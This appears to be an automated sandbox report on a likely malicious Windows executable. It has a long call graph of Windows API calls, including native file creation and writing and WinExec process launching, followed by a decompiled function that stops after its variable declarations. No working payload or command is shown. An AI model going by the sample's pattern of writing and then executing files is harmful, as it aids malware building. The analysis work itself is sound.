286e88a 23206 28544f4 11 API calls 23205->23206 23206->23152 23208 28547b0 11 API calls 23207->23208 23209 286f795 23208->23209 23210 2867b80 19 API calls 23209->23210 23211 286f7b9 23210->23211 23212 2854824 11 API calls 23211->23212 23213 286f7d9 23212->23213 23214 28547b0 11 API calls 23213->23214 23215 286f80e 23214->23215 23216 2867b80 19 API calls 23215->23216 23217 286f832 23216->23217 23218 2854824 11 API calls 23217->23218 23219 286f852 23218->23219 23220 28547b0 11 API calls 23219->23220 23221 286f887 23220->23221 23222 2867b80 19 API calls 23221->23222 23224 286f8ab 23222->23224 23223 28709e7 23225 2854824 11 API calls 23223->23225 23224->23223 23226 2854824 11 API calls 23224->23226 23228 2870a07 23225->23228 23227 286f8e0 23226->23227 23230 2857e40 GetFileAttributesA 23227->23230 23229 28547b0 11 API calls 23228->23229 23234 2870a3c 23229->23234 23231 286f903 23230->23231 23231->23223 23232 286f90b 23231->23232 23233 2854824 11 API calls 23232->23233 23237 286f92b 23233->23237 23235 2867b80 19 API calls 23234->23235 23236 2870a60 23235->23236 23238 2854824 11 API calls 23236->23238 23239 28547b0 11 API calls 23237->23239 23240 2870a80 23238->23240 23241 286f960 23239->23241 23242 28547b0 11 API calls 23240->23242 23243 2867b80 19 API calls 23241->23243 23246 2870ab5 23242->23246 23244 286f984 23243->23244 23245 2854824 11 API calls 23244->23245 23249 286f9a4 23245->23249 23247 2867b80 19 API calls 23246->23247 23248 2870ad9 23247->23248 24190 286c07c 23248->24190 23252 28547b0 11 API calls 23249->23252 23256 286f9d9 23252->23256 23253 28544f4 11 API calls 23254 2870aff 23253->23254 23255 2854824 11 API calls 23254->23255 23259 2870b1f 23255->23259 23257 2867b80 19 API calls 23256->23257 23258 286f9fd 23257->23258 23260 2854824 11 API calls 23258->23260 23261 28547b0 11 API calls 23259->23261 23262 286fa1d 23260->23262 23263 2870b54 23261->23263 23264 28547b0 11 API calls 23262->23264 23265 2867b80 19 API calls 23263->23265 23268 286fa52 23264->23268 
23266 2870b78 23265->23266 23267 2854824 11 API calls 23266->23267 23270 2870b98 23267->23270 23269 2867b80 19 API calls 23268->23269 23271 286fa76 23269->23271 23273 28547b0 11 API calls 23270->23273 23272 2854824 11 API calls 23271->23272 23274 286fa97 23272->23274 23275 2870bcd 23273->23275 23276 2854824 11 API calls 23274->23276 23277 2867b80 19 API calls 23275->23277 23280 286face 23276->23280 23278 2870bf1 23277->23278 23279 2854824 11 API calls 23278->23279 23282 2870c11 23279->23282 23281 28547b0 11 API calls 23280->23281 23284 286fb03 23281->23284 23283 28547b0 11 API calls 23282->23283 23286 2870c46 23283->23286 23285 2867b80 19 API calls 23284->23285 23287 286fb27 23285->23287 23289 2867b80 19 API calls 23286->23289 23288 2854824 11 API calls 23287->23288 23293 286fb47 23288->23293 23290 2870c6a 23289->23290 23291 2857ab0 42 API calls 23290->23291 23292 2870c74 23291->23292 23294 286c5d0 11 API calls 23292->23294 23296 28547b0 11 API calls 23293->23296 23295 2870c86 23294->23295 23297 28544f4 11 API calls 23295->23297 23300 286fb7c 23296->23300 23298 2870c96 23297->23298 23299 2854824 11 API calls 23298->23299 23303 2870cb6 23299->23303 23301 2867b80 19 API calls 23300->23301 23302 286fba0 23301->23302 23304 2854824 11 API calls 23302->23304 23305 28547b0 11 API calls 23303->23305 23306 286fbc0 23304->23306 23307 2870ceb 23305->23307 23308 28547b0 11 API calls 23306->23308 23309 2867b80 19 API calls 23307->23309 23312 286fbf5 23308->23312 23310 2870d0f 23309->23310 23311 2854824 11 API calls 23310->23311 23314 2870d2f 23311->23314 23313 2867b80 19 API calls 23312->23313 23315 286fc19 23313->23315 23317 28547b0 11 API calls 23314->23317 23316 2854824 11 API calls 23315->23316 23318 286fc39 23316->23318 23319 2870d64 23317->23319 23320 28547b0 11 API calls 23318->23320 23321 2867b80 19 API calls 23319->23321 23324 286fc6e 23320->23324 23322 2870d88 23321->23322 23323 2854824 11 API calls 23322->23323 23326 2870da8 23323->23326 23325 2867b80 19 API calls 
23324->23325 23327 286fc92 23325->23327 23329 28547b0 11 API calls 23326->23329 23328 2854824 11 API calls 23327->23328 23330 286fcb2 23328->23330 23331 2870ddd 23329->23331 23332 28547b0 11 API calls 23330->23332 23333 2867b80 19 API calls 23331->23333 23337 286fce7 23332->23337 23334 2870e01 23333->23334 24203 2867c68 23334->24203 23336 2870e11 23338 286c56c 11 API calls 23336->23338 23340 2867b80 19 API calls 23337->23340 23339 2870e22 23338->23339 23341 28544f4 11 API calls 23339->23341 23342 286fd0b 23340->23342 23343 2870e32 23341->23343 23344 2854824 11 API calls 23342->23344 23345 2854824 11 API calls 23343->23345 23346 286fd45 23344->23346 23347 2870e52 23345->23347 23348 2854824 11 API calls 23346->23348 23349 28547b0 11 API calls 23347->23349 23350 286fd7c 23348->23350 23351 2870e87 23349->23351 23352 28547b0 11 API calls 23350->23352 23353 2867b80 19 API calls 23351->23353 23356 286fdb1 23352->23356 23354 2870eab 23353->23354 23355 2854824 11 API calls 23354->23355 23358 2870ecb 23355->23358 23357 2867b80 19 API calls 23356->23357 23359 286fdd5 23357->23359 23361 28547b0 11 API calls 23358->23361 23360 2854824 11 API calls 23359->23360 23362 286fdf5 23360->23362 23363 2870f00 23361->23363 23364 28547b0 11 API calls 23362->23364 23365 2867b80 19 API calls 23363->23365 23368 286fe2a 23364->23368 23366 2870f24 23365->23366 23367 2854824 11 API calls 23366->23367 23370 2870f44 23367->23370 23369 2867b80 19 API calls 23368->23369 23371 286fe4e 23369->23371 23373 28547b0 11 API calls 23370->23373 23372 2854824 11 API calls 23371->23372 23374 286fe6e 23372->23374 23375 2870f79 23373->23375 23376 28547b0 11 API calls 23374->23376 23377 2867b80 19 API calls 23375->23377 23378 286fea3 23376->23378 23379 2870f9d 23377->23379 23382 2867b80 19 API calls 23378->23382 23380 287297f 23379->23380 23381 2854824 11 API calls 23379->23381 23383 2854824 11 API calls 23380->23383 23387 2870ff0 23381->23387 23384 286fec7 23382->23384 23386 287299f 23383->23386 23385 2854824 
11 API calls 23384->23385 23390 286fee7 23385->23390 23388 28547b0 11 API calls 23386->23388 23389 2857e40 GetFileAttributesA 23387->23389 23394 28729d4 23388->23394 23391 2871013 23389->23391 23392 28547b0 11 API calls 23390->23392 23391->23380 23393 2854824 11 API calls 23391->23393 23395 286ff1c 23392->23395 23397 287103b 23393->23397 23396 2867b80 19 API calls 23394->23396 23399 2867b80 19 API calls 23395->23399 23398 28729f8 23396->23398 23401 28547b0 11 API calls 23397->23401 23400 2854824 11 API calls 23398->23400 23402 286ff40 23399->23402 23404 2872a18 23400->23404 23405 2871070 23401->23405 23403 2854824 11 API calls 23402->23403 23407 286ff60 23403->23407 23406 28547b0 11 API calls 23404->23406 23408 2867b80 19 API calls 23405->23408 23411 2872a4d 23406->23411 23410 28547b0 11 API calls 23407->23410 23409 2871094 23408->23409 23412 2857e64 GetFileAttributesA 23409->23412 23414 286ff95 23410->23414 23415 2867b80 19 API calls 23411->23415 23413 28710af 23412->23413 23413->23380 23416 28710b7 23413->23416 23419 2867b80 19 API calls 23414->23419 23417 2872a71 23415->23417 23418 2854824 11 API calls 23416->23418 23420 2854824 11 API calls 23417->23420 23421 28710d7 23418->23421 23425 286ffb9 23419->23425 23422 2872a91 23420->23422 23424 28547b0 11 API calls 23421->23424 23423 28547b0 11 API calls 23422->23423 23428 2872ac6 23423->23428 23429 287110c 23424->23429 24173 286bcf4 23425->24173 23431 2867b80 19 API calls 23428->23431 23432 2867b80 19 API calls 23429->23432 23430 2854824 11 API calls 23435 287001f 23430->23435 23438 2872aea 23431->23438 23433 2871130 23432->23433 23434 2854824 11 API calls 23433->23434 23440 2871150 23434->23440 23436 28547b0 11 API calls 23435->23436 23443 2870054 23436->23443 23437 2873404 23439 2854824 11 API calls 23437->23439 23438->23437 23441 2872b14 23438->23441 23445 2873424 23439->23445 23442 28547b0 11 API calls 23440->23442 23444 2854824 11 API calls 23441->23444 23450 2871185 23442->23450 23446 2867b80 19 API calls 
23443->23446 23449 2872b34 23444->23449 23448 28547b0 11 API calls 23445->23448 23447 2870078 23446->23447 23451 2854824 11 API calls 23447->23451 23454 2873459 23448->23454 23452 28547b0 11 API calls 23449->23452 23453 2867b80 19 API calls 23450->23453 23456 2870098 23451->23456 23461 2872b69 23452->23461 23455 28711a9 23453->23455 23458 2867b80 19 API calls 23454->23458 23457 2854824 11 API calls 23455->23457 23459 28547b0 11 API calls 23456->23459 23463 28711c9 23457->23463 23460 287347d 23458->23460 23467 28700cd 23459->23467 23462 2854824 11 API calls 23460->23462 23464 2867b80 19 API calls 23461->23464 23469 287349d 23462->23469 23466 28547b0 11 API calls 23463->23466 23465 2872b8d 23464->23465 23468 2854824 11 API calls 23465->23468 23474 28711fe 23466->23474 23470 2867b80 19 API calls 23467->23470 23473 2872bad 23468->23473 23472 28547b0 11 API calls 23469->23472 23471 28700f1 23470->23471 23475 2854824 11 API calls 23471->23475 23478 28734d2 23472->23478 23476 28547b0 11 API calls 23473->23476 23477 2867b80 19 API calls 23474->23477 23479 2870111 23475->23479 23483 2872be2 23476->23483 23484 2871222 23477->23484 23480 2867b80 19 API calls 23478->23480 23481 28547b0 11 API calls 23479->23481 23482 28734f6 23480->23482 23490 2870146 23481->23490 23485 2854824 11 API calls 23482->23485 23487 2867b80 19 API calls 23483->23487 24604 2857974 11 API calls 23484->24604 23492 2873516 23485->23492 23489 2872c06 23487->23489 23488 2871257 23493 2854824 11 API calls 23488->23493 23491 2854824 11 API calls 23489->23491 23494 2867b80 19 API calls 23490->23494 23498 2872c26 23491->23498 23496 28547b0 11 API calls 23492->23496 23500 28712ad 23493->23500 23495 287016a 23494->23495 23497 2854824 11 API calls 23495->23497 23501 287354b 23496->23501 23503 287018a 23497->23503 23499 28547b0 11 API calls 23498->23499 23505 2872c5b 23499->23505 23502 28547b0 11 API calls 23500->23502 23504 2867b80 19 API calls 23501->23504 23508 28712e2 23502->23508 23506 28547b0 11 API calls 
23503->23506 23518 287356f 23504->23518 23507 2867b80 19 API calls 23505->23507 23513 28701bf 23506->23513 23510 2872c7f 23507->23510 23512 2867b80 19 API calls 23508->23512 23509 2873c4b 23511 2854824 11 API calls 23509->23511 23514 2854824 11 API calls 23510->23514 23521 2873c6b 23511->23521 23515 2871306 23512->23515 23517 2867b80 19 API calls 23513->23517 23523 2872c9f 23514->23523 23516 2854824 11 API calls 23515->23516 23525 287134c 23516->23525 23519 28701e3 23517->23519 23518->23509 23520 2854824 11 API calls 23518->23520 23522 2854824 11 API calls 23519->23522 23527 28735b9 23520->23527 23524 28547b0 11 API calls 23521->23524 23528 2870203 23522->23528 23526 28547b0 11 API calls 23523->23526 23532 2873ca0 23524->23532 23915 2864db8 48 API calls 23525->23915 23531 2872cd4 23526->23531 23530 28547b0 11 API calls 23527->23530 23533 28547b0 11 API calls 23528->23533 23529 2871374 23529->22260 23536 28735ee 23530->23536 23534 2867b80 19 API calls 23531->23534 23535 2867b80 19 API calls 23532->23535 23539 2870238 23533->23539 23537 2872cf8 23534->23537 23538 2873cc4 23535->23538 23542 2867b80 19 API calls 23536->23542 23540 28547b0 11 API calls 23537->23540 23541 2854824 11 API calls 23538->23541 23544 2867b80 19 API calls 23539->23544 23543 2872d10 23540->23543 23549 2873ce4 23541->23549 23545 2873612 23542->23545 23548 2872d1b WinExec 23543->23548 23546 287025c 23544->23546 23547 2854824 11 API calls 23545->23547 23550 2854824 11 API calls 23546->23550 23553 2873632 23547->23553 23551 2854824 11 API calls 23548->23551 23552 28547b0 11 API calls 23549->23552 23554 287027c 23550->23554 23555 2872d41 23551->23555 23558 2873d19 23552->23558 23556 28547b0 11 API calls 23553->23556 23559 28547b0 11 API calls 23554->23559 23557 28547b0 11 API calls 23555->23557 23561 2873667 23556->23561 23562 2872d76 23557->23562 23560 2867b80 19 API calls 23558->23560 23563 28702b1 23559->23563 23568 2873d3d 23560->23568 23564 2867b80 19 API calls 23561->23564 23567 2867b80 19 API 
calls 23562->23567 23565 2867b80 19 API calls 23563->23565 23566 287368b 23564->23566 23569 28702d5 23565->23569 23570 2854824 11 API calls 23566->23570 23575 2872d9a 23567->23575 23571 2867b80 19 API calls 23568->23571 23574 2854824 11 API calls 23569->23574 23576 28736ab 23570->23576 23572 2873d70 23571->23572 23573 2854824 11 API calls 23572->23573 23580 2873d90 23573->23580 23581 2870314 23574->23581 24605 2867fe4 29 API calls 23575->24605 23578 28547b0 11 API calls 23576->23578 23585 28736e0 23578->23585 23579 2872dc1 23582 2854824 11 API calls 23579->23582 23583 28547b0 11 API calls 23580->23583 23584 28547b0 11 API calls 23581->23584 23586 2872de1 23582->23586 23590 2873dc5 23583->23590 23591 2870349 23584->23591 23587 2867b80 19 API calls 23585->23587 23589 28547b0 11 API calls 23586->23589 23588 2873704 23587->23588 23592 2867c68 11 API calls 23588->23592 23601 2872e16 23589->23601 23595 2867b80 19 API calls 23590->23595 23593 2867b80 19 API calls 23591->23593 23594 287371f 23592->23594 23596 287036d 23593->23596 23597 2854824 11 API calls 23594->23597 23598 2873de9 23595->23598 23600 2854824 11 API calls 23596->23600 23603 2873748 23597->23603 23599 2854824 11 API calls 23598->23599 23605 2873e09 23599->23605 23606 287038d 23600->23606 23602 2867b80 19 API calls 23601->23602 23604 2872e3a 23602->23604 23608 2854824 11 API calls 23603->23608 23607 2854824 11 API calls 23604->23607 23609 28547b0 11 API calls 23605->23609 23610 28547b0 11 API calls 23606->23610 23611 2872e5a 23607->23611 23612 287377f 23608->23612 23614 2873e3e 23609->23614 23615 28703c2 23610->23615 23613 28547b0 11 API calls 23611->23613 23616 28547b0 11 API calls 23612->23616 23621 2872e8f 23613->23621 23617 2867b80 19 API calls 23614->23617 23618 2867b80 19 API calls 23615->23618 23623 28737b4 23616->23623 23620 2873e62 23617->23620 23619 28703e6 23618->23619 23624 2854824 11 API calls 23619->23624 23622 2854824 11 API calls 23620->23622 23625 2867b80 19 API calls 23621->23625 23628 
2873e82 23622->23628 23626 2867b80 19 API calls 23623->23626 23633 2870415 23624->23633 23627 2872eb3 23625->23627 23629 28737d8 23626->23629 23630 2854824 11 API calls 23627->23630 23632 28547b0 11 API calls 23628->23632 23631 2854824 11 API calls 23629->23631 23635 2872ed3 23630->23635 23637 28737f8 23631->23637 23639 2873eb7 23632->23639 24602 2857974 11 API calls 23633->24602 23638 28547b0 11 API calls 23635->23638 23636 287043d 23640 28547b0 11 API calls 23636->23640 23642 28547b0 11 API calls 23637->23642 23644 2872f08 23638->23644 23643 2867b80 19 API calls 23639->23643 23641 2870453 23640->23641 23645 2854824 11 API calls 23641->23645 23646 287382d 23642->23646 23648 2873edb 23643->23648 23647 2867b80 19 API calls 23644->23647 23652 2870483 23645->23652 23649 2867b80 19 API calls 23646->23649 23650 2872f2c 23647->23650 23651 2867b80 19 API calls 23648->23651 23653 2873851 23649->23653 23657 2854824 11 API calls 23650->23657 23659 2873f0e 23651->23659 23655 28547b0 11 API calls 23652->23655 23654 2857e40 GetFileAttributesA 23653->23654 23656 287385b 23654->23656 23663 28704b8 23655->23663 23658 2873ab2 23656->23658 23660 2854824 11 API calls 23656->23660 23664 2872f6b 23657->23664 23661 2854824 11 API calls 23658->23661 23662 2867b80 19 API calls 23659->23662 23668 2873883 23660->23668 23672 2873f41 23662->23672 23667 2867b80 19 API calls 23663->23667 23665 28547b0 11 API calls 23664->23665 23674 2872fa0 23665->23674 23669 28704dc 23667->23669 23670 28547b0 11 API calls 23668->23670 23673 2854824 11 API calls 23669->23673 23675 2867b80 19 API calls 23672->23675 23676 28704fc 23673->23676 23681 2873f74 23675->23681 23682 28547b0 11 API calls 23676->23682 23691 2870531 23682->23691 23695 2867b80 19 API calls 23691->23695 23698 2870555 23695->23698 24603 2857974 11 API calls 23698->24603 23704 287056b 23709 28547b0 11 API calls 23704->23709 23710 2870581 23709->23710 23915->23529 23917 2854815 23916->23917 23918 28547b4 23916->23918 23919 28544f4 23918->23919 
23920 28547bc 23918->23920 23924 2854564 11 API calls 23919->23924 23926 2854508 23919->23926 23920->23917 23921 28547cb 23920->23921 23923 28544f4 11 API calls 23920->23923 23925 2854564 11 API calls 23921->23925 23922 2854536 23922->22274 23923->23921 23924->23926 23928 28547e5 23925->23928 23926->23922 23927 2852c2c 11 API calls 23926->23927 23927->23922 23929 28544f4 11 API calls 23928->23929 23930 2854811 23929->23930 23930->22274 23932 2852eed 23931->23932 23933 2852ef8 GetTickCount 23931->23933 23932->22314 23933->22314 23935 2854964 23934->23935 23936 2857e4a GetFileAttributesA 23935->23936 23937 2857e55 23936->23937 23937->22361 23937->22362 23939 285469e 23938->23939 24628 2854590 23940->24628 23944 2854ee4 2 API calls 23943->23944 23945 286bded 23944->23945 23946 28544a0 11 API calls 23945->23946 23947 286be02 23946->23947 23948 286be12 RtlDosPathNameToNtPathName_U 23947->23948 24633 286bc3c 23948->24633 23950 286be2e NtOpenFile NtQueryInformationFile 23951 2854b90 11 API calls 23950->23951 23952 286be69 23951->23952 23953 28549bc 11 API calls 23952->23953 23954 286be75 NtReadFile NtClose 23953->23954 23955 2854c24 SysFreeString 23954->23955 23956 286bea7 23955->23956 23956->22523 23958 286bf49 23957->23958 23959 28544f4 11 API calls 23958->23959 23960 286bf75 23959->23960 24634 2855794 23960->24634 23962 286bfb5 23963 28544f4 11 API calls 23962->23963 23965 286bfc7 23963->23965 23964 28549c4 11 API calls 23966 286bf99 23964->23966 23967 28544c4 11 API calls 23965->23967 23966->23962 23966->23964 23966->23965 24637 2854a04 11 API calls 23966->24637 23969 286c02c 23967->23969 23970 28557dc 23969->23970 23971 28557e3 23970->23971 23972 28557fd 23971->23972 24660 28557a0 13 API calls 23971->24660 23972->22563 23975 286beca 23974->23975 24661 2858d78 23975->24661 23978 28544a0 11 API calls 23979 286bf1d 23978->23979 23979->22690 23979->22757 23981 2857ac0 23980->23981 23982 2857ae1 23981->23982 24666 2857644 42 API calls 23981->24666 23984 286c5d0 
23982->23984 23985 286c5ed 23984->23985 23986 286c64b 23985->23986 24667 2854688 11 API calls 23985->24667 24668 28544f4 11 API calls 23985->24668 23987 28544a0 11 API calls 23986->23987 23989 286c660 23987->23989 23990 28544a0 11 API calls 23989->23990 23991 286c668 23990->23991 23991->22774 24669 2866d64 23993->24669 23995 2866dfa 23996 2866e01 CoCreateInstance 23995->23996 24676 2866d54 23996->24676 23999 28544a0 11 API calls 24000 2866e92 23999->24000 24001 286287c 24000->24001 24002 2862890 24001->24002 24003 2862889 24001->24003 24002->23004 24681 285e348 24003->24681 24006 285e3f2 24005->24006 24007 285e40f 24005->24007 24008 285e3e0 60 API calls 24006->24008 24009 285e41c VariantInit 24007->24009 24011 285e415 24007->24011 24010 285e407 24008->24010 24009->24011 24010->23038 24017 285e460 24011->24017 24709 2862e88 EnterCriticalSection LeaveCriticalSection 24011->24709 24012 285e4d3 24012->23038 24015 285e48b 24015->24017 24710 285dc7c 42 API calls 24015->24710 24017->24012 24702 285e7f0 24017->24702 24021 28617d4 24020->24021 24021->24021 24022 2861a35 24021->24022 24023 2861866 24021->24023 24024 28618e4 24021->24024 24025 2861964 24021->24025 24026 2861905 24021->24026 24027 2861922 24021->24027 24028 28618c3 24021->24028 24029 286188e 24021->24029 24030 28619ee 24021->24030 24031 2861a0b 24021->24031 24032 28618a9 24021->24032 24033 28619b5 24021->24033 24034 28619d0 24021->24034 24035 286193f 24021->24035 24036 286197f 24021->24036 24037 2861a1c 24021->24037 24038 286185a 24021->24038 24039 286199a 24021->24039 24040 2861a45 24022->24040 24041 2861a3e 24022->24041 24057 286187c 24023->24057 24736 285dbe0 44 API calls 24023->24736 24740 2858d18 11 API calls 24024->24740 24743 286154c 46 API calls 24025->24743 24741 28614dc 46 API calls 24026->24741 24742 2861514 46 API calls 24027->24742 24739 2858d18 11 API calls 24028->24739 24737 2857974 11 API calls 24029->24737 24748 2857a60 11 API calls 24030->24748 24061 28617cc 70 API calls 24031->24061 24738 
2857974 11 API calls 24032->24738 24746 2857974 11 API calls 24033->24746 24747 2857a60 11 API calls 24034->24747 24732 2854e54 24035->24732 24744 2857974 11 API calls 24036->24744 24749 2861614 57 API calls 24037->24749 24055 28544a0 11 API calls 24038->24055 24745 2857974 11 API calls 24039->24745 24049 28544f4 11 API calls 24040->24049 24047 2861a54 24041->24047 24048 2861a43 24041->24048 24750 28616e0 70 API calls 24047->24750 24083 2861a76 24048->24083 24084 2861c81 24048->24084 24134 2861861 24049->24134 24055->24134 24072 28544f4 11 API calls 24057->24072 24061->24134 24062 2861a26 24076 28544f4 11 API calls 24062->24076 24063 28618b4 24077 28544f4 11 API calls 24063->24077 24064 286198b 24078 28544f4 11 API calls 24064->24078 24065 28618d5 24079 28544f4 11 API calls 24065->24079 24066 28619a6 24080 28544f4 11 API calls 24066->24080 24068 28618f6 24082 28544f4 11 API calls 24068->24082 24069 28619c1 24085 28544f4 11 API calls 24069->24085 24070 28619df 24086 28544f4 11 API calls 24070->24086 24072->24134 24073 28619fc 24087 28544f4 11 API calls 24073->24087 24074 286189a 24075 28544f4 11 API calls 24074->24075 24075->24134 24076->24134 24077->24134 24078->24134 24079->24134 24080->24134 24081 2861a5e 24089 28544f4 11 API calls 24081->24089 24082->24134 24090 2861c6b 24083->24090 24093 2861c07 24083->24093 24094 2861c24 24083->24094 24095 2861ae2 24083->24095 24096 2861b80 24083->24096 24097 2861b61 24083->24097 24098 2861c41 24083->24098 24099 2861bcd 24083->24099 24100 2861bea 24083->24100 24101 2861bb0 24083->24101 24102 2861b3e 24083->24102 24103 2861aff 24083->24103 24104 2861b9f 24083->24104 24105 2861c5d 24083->24105 24106 2861b1b 24083->24106 24091 28544a0 11 API calls 24084->24091 24085->24134 24086->24134 24087->24134 24088 28544c4 11 API calls 24092 2861cc3 24088->24092 24089->24134 24764 2861614 57 API calls 24090->24764 24108 2861c88 24091->24108 24112 2854c3c SysFreeString 24092->24112 24761 2857974 11 API calls 24093->24761 24762 2857a60 11 API 
calls 24094->24762 24751 2857974 11 API calls 24095->24751 24756 2861514 46 API calls 24096->24756 24755 28614dc 46 API calls 24097->24755 24763 2857a60 11 API calls 24098->24763 24759 2857974 11 API calls 24099->24759 24760 2857974 11 API calls 24100->24760 24758 286154c 46 API calls 24101->24758 24754 2858d18 11 API calls 24102->24754 24752 2857974 11 API calls 24103->24752 24757 28545fc 12 API calls 24104->24757 24118 28617cc 70 API calls 24105->24118 24753 2858d18 11 API calls 24106->24753 24765 2861744 53 API calls 24108->24765 24130 2861cd0 24112->24130 24118->24134 24121 2861c75 24135 28544f4 11 API calls 24121->24135 24126 2861b2f 24139 28544f4 11 API calls 24126->24139 24127 2861bf8 24140 28544f4 11 API calls 24127->24140 24128 2861b52 24141 28544f4 11 API calls 24128->24141 24129 2861c15 24142 28544f4 11 API calls 24129->24142 24143 28544c4 11 API calls 24130->24143 24131 2861c35 24144 28544f4 11 API calls 24131->24144 24132 2861c51 24145 28544f4 11 API calls 24132->24145 24133 2861af0 24146 28544f4 11 API calls 24133->24146 24134->24088 24135->24134 24136 2861b0c 24147 28544f4 11 API calls 24136->24147 24137 2861bdb 24148 28544f4 11 API calls 24137->24148 24138 2861c91 24138->24134 24766 2861614 57 API calls 24138->24766 24139->24134 24140->24134 24141->24134 24142->24134 24150 2861cdd 24143->24150 24144->24134 24145->24134 24146->24134 24147->24134 24148->24134 24152 2854c3c SysFreeString 24150->24152 24151 2861c9f 24153 28544f4 11 API calls 24151->24153 24154 2861cea 24152->24154 24153->24134 24155 28544c4 11 API calls 24154->24155 24156 2861cf7 24155->24156 24156->23117 24158 28544f4 11 API calls 24157->24158 24161 286c580 24158->24161 24159 286c5c7 24159->22918 24160 28549bc 11 API calls 24160->24161 24161->24159 24161->24160 24163 2854964 24162->24163 24164 2857e6e GetFileAttributesA 24163->24164 24165 2857e79 24164->24165 24165->23128 24165->23129 24167 28549f6 24166->24167 24169 28549c9 24166->24169 24168 28544a0 11 API calls 24167->24168 24172 
28549ec 24168->24172 24169->24167 24170 28549dd 24169->24170 24171 2854590 11 API calls 24170->24171 24171->24172 24172->23180 24174 286bd0a 24173->24174 24175 2854ee4 2 API calls 24174->24175 24176 286bd12 24175->24176 24177 286bd32 RtlDosPathNameToNtPathName_U 24176->24177 24776 286bc3c 24177->24776 24179 286bd4e NtCreateFile 24180 286bd79 24179->24180 24181 28549bc 11 API calls 24180->24181 24182 286bd8b NtWriteFile NtClose 24181->24182 24183 2854c24 SysFreeString 24182->24183 24184 286bdbd 24183->24184 24185 28544a0 11 API calls 24184->24185 24186 286bdc5 24185->24186 24186->23430 24201 286c09e 24190->24201 24191 286c140 24192 2854b90 11 API calls 24191->24192 24193 286c155 24192->24193 24194 28544f4 11 API calls 24193->24194 24196 286c160 24194->24196 24197 28544a0 11 API calls 24196->24197 24199 286c175 24197->24199 24200 28544c4 11 API calls 24199->24200 24202 286c182 24200->24202 24201->24191 24812 2854688 11 API calls 24201->24812 24813 28544f4 11 API calls 24201->24813 24202->23253 24204 2867c77 24203->24204 24205 2854b90 11 API calls 24204->24205 24206 2867c84 24205->24206 24206->23336 24600->23205 24601->23128 24602->23636 24603->23704 24604->23488 24605->23579 24622 2854c42 24621->24622 24623 2854c48 SysFreeString 24622->24623 24624 2854c5a 24622->24624 24623->24622 24624->22708 24625->22853 24626->22867 24627->22881 24629 2854564 11 API calls 24628->24629 24630 28545a0 24629->24630 24631 28544a0 11 API calls 24630->24631 24632 28545b8 24631->24632 24632->22394 24633->23950 24638 2855608 24634->24638 24637->23966 24639 2855627 24638->24639 24640 2855641 24638->24640 24641 2855632 24639->24641 24655 2852cf4 11 API calls 24639->24655 24645 285568a 24640->24645 24657 2852cf4 11 API calls 24640->24657 24656 2855600 13 API calls 24641->24656 24644 285563c 24644->23966 24647 2855697 24645->24647 24648 28556cc 24645->24648 24658 2852c44 11 API calls 24647->24658 24650 2852c10 11 API calls 24648->24650 24651 28556d6 24650->24651 24652 28556c7 24651->24652 

Control-flow Graph (function 02869D28; nodes marked Executed / Not Executed)
                                                                                                  C-Code - Quality: 45%
                                                                                                  			E02869D28(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				char _v20;
                                                                                                  				char _v24;
                                                                                                  				char _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				char _v36;
                                                                                                  				char _v40;
                                                                                                  				char _v44;
                                                                                                  				intOrPtr _v48;
                                                                                                  				char _v52;
                                                                                                  				char _v56;
                                                                                                  				char _v60;
                                                                                                  				intOrPtr _v64;
                                                                                                  				char _v68;
                                                                                                  				char _v72;
                                                                                                  				char _v76;
                                                                                                  				intOrPtr _v80;
                                                                                                  				char _v84;
                                                                                                  				char _v88;
                                                                                                  				char _v92;
                                                                                                  				intOrPtr _v96;
                                                                                                  				char _v100;
                                                                                                  				char _v104;
                                                                                                  				char _v108;
                                                                                                  				intOrPtr _v112;
                                                                                                  				char _v116;
                                                                                                  				char _v120;
                                                                                                  				char _v124;
                                                                                                  				intOrPtr _v128;
                                                                                                  				char _v132;
                                                                                                  				char _v136;
                                                                                                  				char _v140;
                                                                                                  				intOrPtr _v144;
                                                                                                  				char _v148;
                                                                                                  				char _v152;
                                                                                                  				char _v156;
                                                                                                  				intOrPtr _v160;
                                                                                                  				char _v164;
                                                                                                  				char _v168;
                                                                                                  				char _v172;
                                                                                                  				char _v176;
                                                                                                  				intOrPtr _v180;
                                                                                                  				char _v184;
                                                                                                  				char _v188;
                                                                                                  				char _v192;
                                                                                                  				intOrPtr _v196;
                                                                                                  				char _v200;
                                                                                                  				char _v204;
                                                                                                  				char _v208;
                                                                                                  				intOrPtr _v212;
                                                                                                  				char _v216;
                                                                                                  				char _v220;
                                                                                                  				char _v224;
                                                                                                  				intOrPtr _v228;
                                                                                                  				char _v232;
                                                                                                  				char _v236;
                                                                                                  				char _v240;
                                                                                                  				intOrPtr _v244;
                                                                                                  				char _v248;
                                                                                                  				char _v252;
                                                                                                  				char _v256;
                                                                                                  				intOrPtr _v260;
                                                                                                  				char _v264;
                                                                                                  				char _v268;
                                                                                                  				char _v272;
                                                                                                  				intOrPtr _v276;
                                                                                                  				char _v280;
                                                                                                  				char _v284;
                                                                                                  				char _v288;
                                                                                                  				intOrPtr _v292;
                                                                                                  				char _v296;
                                                                                                  				char _v300;
                                                                                                  				char _v304;
                                                                                                  				intOrPtr _v308;
                                                                                                  				char _v312;
                                                                                                  				char _v316;
                                                                                                  				char _v320;
                                                                                                  				intOrPtr _v324;
                                                                                                  				char _v328;
                                                                                                  				char _v332;
                                                                                                  				char _v336;
                                                                                                  				intOrPtr _v340;
                                                                                                  				char _v344;
                                                                                                  				char _v348;
                                                                                                  				char _v352;
                                                                                                  				intOrPtr _v356;
                                                                                                  				char _v360;
                                                                                                  				char _v364;
                                                                                                  				char _v368;
                                                                                                  				intOrPtr _v372;
                                                                                                  				char _v376;
                                                                                                  				char _v380;
                                                                                                  				char _v384;
                                                                                                  				intOrPtr _v388;
                                                                                                  				char _v392;
                                                                                                  				char _v396;
                                                                                                  				char _v400;
                                                                                                  				intOrPtr _v404;
                                                                                                  				char _v408;
                                                                                                  				char _v412;
                                                                                                  				char _v416;
                                                                                                  				intOrPtr _v420;
                                                                                                  				char _v424;
                                                                                                  				char _v428;
                                                                                                  				char _v432;
                                                                                                  				intOrPtr _v436;
                                                                                                  				char _v440;
                                                                                                  				char _v444;
                                                                                                  				char _v448;
                                                                                                  				intOrPtr _v452;
                                                                                                  				char _v456;
                                                                                                  				char _v460;
                                                                                                  				char _v464;
                                                                                                  				intOrPtr _v468;
                                                                                                  				char _v472;
